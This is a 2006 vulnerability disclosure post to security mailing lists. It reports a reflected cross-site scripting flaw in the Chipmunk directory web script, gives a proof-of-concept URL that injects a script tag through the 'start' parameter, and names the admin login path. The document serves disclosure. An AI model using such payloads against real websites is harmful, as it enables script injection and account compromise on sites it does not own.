
Date: Mon, 29 May 2006 02:32:30 +0300
From: "black code" <black-cod3@...mail.com>
To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com,
	content@...uritydot.net, listadmin@...urityfocus.com,
	MAILER-DAEMON@...ta.fr, MAILER-DAEMON@...lex05.paran.com,
	postmaster@...an.com, root@...uritydot.net, str0ke@...w0rm.com,
	submit@...w0rm.com, webmaster@...urityfocus.com
Subject: Xss exploit in Chipmunk directory


Xss exploit in Chipmunk directory

forum type : Chipmunk directory
bug found by : black-code
team : site-down
type : Xss

black-code:

codes :

http://www.example.com/directory/index.php?catid=catid&start='><script>alert(10)</script>


path to admin login:

http://www.xxx.com/path/admin

All my respect to my friend sweet-devil , lezr.com , g123g.net ..

done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



